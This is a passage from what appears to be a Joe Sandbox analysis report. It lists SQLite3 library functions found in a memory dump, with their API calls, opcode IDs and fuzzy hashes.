                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_realloc64
                                                                                              • String ID:
                                                                                              • API String ID: 3621699333-0
                                                                                              • Opcode ID: 49cdd410d009c5c60e6dc54a98cf30d01d919e68cd65b05123a3aab6e8fa3962
                                                                                              • Instruction ID: 2bb0315b9fd8656c7dfc11135548e8cf224f3702bbfcb23244ab88d3c114d46b
                                                                                              • Opcode Fuzzy Hash: 49cdd410d009c5c60e6dc54a98cf30d01d919e68cd65b05123a3aab6e8fa3962
                                                                                              • Instruction Fuzzy Hash: 6551D0B0A053599BEB10DFA8D58479EBBF5FF88308F208429E894AB350D775E950CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E7F0AD Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_step.SQLITE3(?,?,?,?,?,?,?,00000004,?,?,61E7F9F2), ref: 61E7F0EC
                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E7F16C
                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E7F1BB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_finalize$sqlite3_step
                                                                                              • String ID: integer$null$real$#a
                                                                                              • API String ID: 2395141310-14704807
                                                                                              • Opcode ID: f700a5ffa2a6a0ab3cfd5d6dbd466371d8c59f7b378ec2fdfab1408dbda561cf
                                                                                              • Instruction ID: 4bd31f607a4e8361d1f2f8ac55677c15498f9f18ac8b1eaa9c52af6293c1e55d
                                                                                              • Opcode Fuzzy Hash: f700a5ffa2a6a0ab3cfd5d6dbd466371d8c59f7b378ec2fdfab1408dbda561cf
                                                                                              • Instruction Fuzzy Hash: DE5128B09047558FDB14CF69D480A5ABBF0FF89324F25C96DD858AB311D378E881CB95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1B482 Relevance: 13.9, APIs: 9, Instructions: 408COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 423083942-0
                                                                                              • Opcode ID: 9707b4d36566ebc79409bd4c0694eb43f5f6542578b6686b74c4430cd1e9a97e
                                                                                              • Instruction ID: 1063ebef09cc3e7b4e504a40b563ff33675709cdf6d7ccb25422242ac10cb902
                                                                                              • Opcode Fuzzy Hash: 9707b4d36566ebc79409bd4c0694eb43f5f6542578b6686b74c4430cd1e9a97e
                                                                                              • Instruction Fuzzy Hash: 7D029F74E09219DFDB04CFA8D581A8EBBF2BF48314F25C559E854AB319D730E942CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E26F2F Relevance: 13.8, APIs: 9, Instructions: 341COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E26F4E
                                                                                              • sqlite3_result_error_toobig.SQLITE3 ref: 61E2702F
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E27055
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E272D1
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E272FE
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E27308
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E2736E
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E27491
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                              • String ID:
                                                                                              • API String ID: 2444656285-0
                                                                                              • Opcode ID: 94af4734501517e793e48dc2c573e3313890df8ca510069b24fcfa55a766f326
                                                                                              • Instruction ID: 4d44793e144b9a2820f313a2eebc91827e5b5ebf833259aae5da6bbc5cf3bc7c
                                                                                              • Opcode Fuzzy Hash: 94af4734501517e793e48dc2c573e3313890df8ca510069b24fcfa55a766f326
                                                                                              • Instruction Fuzzy Hash: 73E1AF71D4839ACBDB208F58C8A0B99BBF1BF5A304F65C4A9D89897340D774D9C68F42
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E2774C Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                                                              • String ID:
                                                                                              • API String ID: 336169149-0
                                                                                              • Opcode ID: 3df200b8f1a461f68bdf788d93f5251158f3aaba308a0e17f2d3a28bf19232aa
                                                                                              • Instruction ID: 59a9193cccddd2f1c043736338f9cfac766812144d87cb7bc14d8ff9515d2e2d
                                                                                              • Opcode Fuzzy Hash: 3df200b8f1a461f68bdf788d93f5251158f3aaba308a0e17f2d3a28bf19232aa
                                                                                              • Instruction Fuzzy Hash: FD61BEB0A0C39A8ED7019F68C8A475ABFE2AB95318F29C55CE4C84B395D775C845CB42
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E36E74 Relevance: 13.6, APIs: 9, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_get_auxdata$memcmpsqlite3_freesqlite3_malloc64sqlite3_result_error_nomemsqlite3_set_auxdatasqlite3_value_bytessqlite3_value_text
                                                                                              • String ID:
                                                                                              • API String ID: 3041890313-0
                                                                                              • Opcode ID: 375577031df126b08e877b7a2233b6e8f0c4f2ad026f26e897456626cc130d63
                                                                                              • Instruction ID: d4c2781f6638f3cfb7ffd437c6556cfc8ea3dcd392fb2c339905c271e7fd5172
                                                                                              • Opcode Fuzzy Hash: 375577031df126b08e877b7a2233b6e8f0c4f2ad026f26e897456626cc130d63
                                                                                              • Instruction Fuzzy Hash: 6251D4B0A042698FCB40DFB9C584A9EBBF0AF8C318F608569E854EB340E734D981CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E33EF6 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 366COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$sqlite3_free$sqlite3_malloc64
                                                                                              • String ID: 0
                                                                                              • API String ID: 3361124181-4108050209
                                                                                              • Opcode ID: 0dccca72ba2fd4d36ecec91ec5d10b117968ee10b702043cb1b1ea2e9803f18f
                                                                                              • Instruction ID: 0768fe1081e9b69e3edf410ef168a4202b288a9bf622709cf2342c0b78c84549
                                                                                              • Opcode Fuzzy Hash: 0dccca72ba2fd4d36ecec91ec5d10b117968ee10b702043cb1b1ea2e9803f18f
                                                                                              • Instruction Fuzzy Hash: 48E11370A042698BDB11CFA8C88078DBBF1BF89318F25856AD859EB355D736D886CF41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E938E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                                                              • String ID: @
                                                                                              • API String ID: 1503958624-2766056989
                                                                                              • Opcode ID: fdd9a4d83f785c7ac4a36669a548c3c4cf55efd1698a5651848bcc39e431dc4c
                                                                                              • Instruction ID: 3cc158fa83f7a296c613447eb15a0efa60065617e1f84f2c8de968e689c570ef
                                                                                              • Opcode Fuzzy Hash: fdd9a4d83f785c7ac4a36669a548c3c4cf55efd1698a5651848bcc39e431dc4c
                                                                                              • Instruction Fuzzy Hash: 7A41F3B1915B428FE710EF69C58461ABBE0FF85354F64CD2DE8989B350E734E884CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E32EE4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E32F19
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E32F42
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E32F4F
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32F6F
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E32F79
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E32F85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_contextsqlite3_str_append
                                                                                              • String ID: ,)?
                                                                                              • API String ID: 2741546359-1010226240
                                                                                              • Opcode ID: 7d8635f7cfc349ada74e2eb2be3546356384360816e71fcc08cd628a256cc39b
                                                                                              • Instruction ID: f5b833d64daf783a2577a34218afbc38f8240d23d1cfda83196c7f49aefc02f2
                                                                                              • Opcode Fuzzy Hash: 7d8635f7cfc349ada74e2eb2be3546356384360816e71fcc08cd628a256cc39b
                                                                                              • Instruction Fuzzy Hash: 98215975A046468FD700DF69C484A5ABBE1FFC8364F25C92EE8988B300D775D882CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E38369 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E38381
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E383AE
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E383DF
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3842D
                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E3843D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                              • String ID: J
                                                                                              • API String ID: 3250357221-1141589763
                                                                                              • Opcode ID: 2a0d1d657c8e282c949d41eaad7b25c1b9e45e0c253af6e887945158fe09f359
                                                                                              • Instruction ID: ec653ec6287599f0c595cfbfd3c38c3a41db07598e0b1053ff37f467178e8482
                                                                                              • Opcode Fuzzy Hash: 2a0d1d657c8e282c949d41eaad7b25c1b9e45e0c253af6e887945158fe09f359
                                                                                              • Instruction Fuzzy Hash: F0215BB05087519FDB009F28C48560ABFE0BFC5768F64CA5DE8A8CB785D374C851DB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E381D7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E381EF
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3821A
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3824B
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E38299
                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E382A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                              • String ID: J
                                                                                              • API String ID: 3250357221-1141589763
                                                                                              • Opcode ID: ee44083692571ff0bb79daf76e6c4e2e5c149ce10d701330d4f3484b551bddaa
                                                                                              • Instruction ID: 16bf8918ab645b76a71af769fa2177cb1ee8791df48233cbdeb5ed20f232067a
                                                                                              • Opcode Fuzzy Hash: ee44083692571ff0bb79daf76e6c4e2e5c149ce10d701330d4f3484b551bddaa
                                                                                              • Instruction Fuzzy Hash: 8A2130B0508B519BDB109F69C48560ABBE0BFC5728F24CA5DECA88B389D374C851DB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E91EAB Relevance: 12.3, APIs: 8, Instructions: 272COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_mutex_entersqlite3_randomness$sqlite3_malloc64sqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1657278834-0
                                                                                              • Opcode ID: 037ae5b8c333d34cbbec6e3d9a0049126deeb791c701d5475eb786d43c0ed2a5
                                                                                              • Instruction ID: 8068adcc6f0b1ad646351a18687d857129ab8cdedc007b65eee18779acbddef4
                                                                                              • Opcode Fuzzy Hash: 037ae5b8c333d34cbbec6e3d9a0049126deeb791c701d5475eb786d43c0ed2a5
                                                                                              • Instruction Fuzzy Hash: C3B15C75E0924A9BCF00CFA8C48068DB7F1FF9A714F28C96AE864AB354D734E945CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E27D4B Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                                                              • String ID:
                                                                                              • API String ID: 3386002893-0
                                                                                              • Opcode ID: f64447981622f53cecfa20fa162f52d556e154730efa79d9c09943a78c8dcd64
                                                                                              • Instruction ID: f05443a4a6d11a3577d3b07827b37d9fe96948bfa4a033d1d3c2008329084dbf
                                                                                              • Opcode Fuzzy Hash: f64447981622f53cecfa20fa162f52d556e154730efa79d9c09943a78c8dcd64
                                                                                              • Instruction Fuzzy Hash: 24619F71E042568FDB01CFA8C5A0A9DBBF1AF99314F25C56EE895AB390D730DC41CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E72F0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 134COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
